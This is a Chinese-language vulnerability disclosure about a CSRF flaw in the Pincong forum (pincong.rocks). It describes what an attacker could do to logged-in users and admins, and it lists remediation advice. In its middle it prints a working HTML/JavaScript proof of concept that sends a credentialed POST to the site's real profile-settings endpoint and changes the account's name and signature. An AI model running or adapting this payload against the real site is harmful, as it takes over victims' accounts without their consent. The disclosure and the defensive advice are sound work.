【安全漏洞】品葱存在安全漏洞

漏洞影响

在普通用户已经登录品葱的情况下，如果点击了攻击者精心构造的链接，攻击者可以操纵帐号进行包括不限于点赞、关注、更改隐私设置、更改个人profile等操作
在管理员已经登录品葱的情况下，如果点击了攻击者精心构造的链接，攻击者除了可以操控普通帐号的功能外，还能进行删除/创建用户，修改网站设置，添加网站统计代码
如果网站被添加统计代码攻击者就可以给所有用户执行任意JS代码，搜集用户信息

漏洞POC

将漏洞POC保存成HTML文件，在登录了品葱的浏览器中打开，即可发现品葱账户名和签名被修改

<!DOCTYPE html>

<html lang="en">

<head>

    <meta charset="UTF-8">

    <title>POC</title>

</head>

<body>

    <script>

        req = new XMLHttpRequest();

        data = "user_name=test123456&sex=1&signature=test123456&default_timezone=&_post_type=ajax"; 

        req.open('post','https://pincong.rocks/account/ajax/profile_setting/',true); 

        req.setRequestHeader("Content-Type","application/x-www-form-urlencoded");

        req.withCredentials = true;

        req.send(data);

        </script>

</body>

</html>

修复措施/防御建议

站长可以通过增加CSRF Token来防范攻击，也可以通过检查Referer头进行简单防范
对于用户，应该在浏览器隐身模式下使用品葱以防范此类攻击
同时，由于品葱处在一个对抗性的网络环境中，建议在启用Cloudflare基础攻击防护的基础上在服务器上部署文件防篡改防护和RASP防护以防御变形payload攻击，同时在不储存用户的隐私的情况下保存系统日志定时审计


最后

希望我们能撑到每个人都能摘下面具的那一天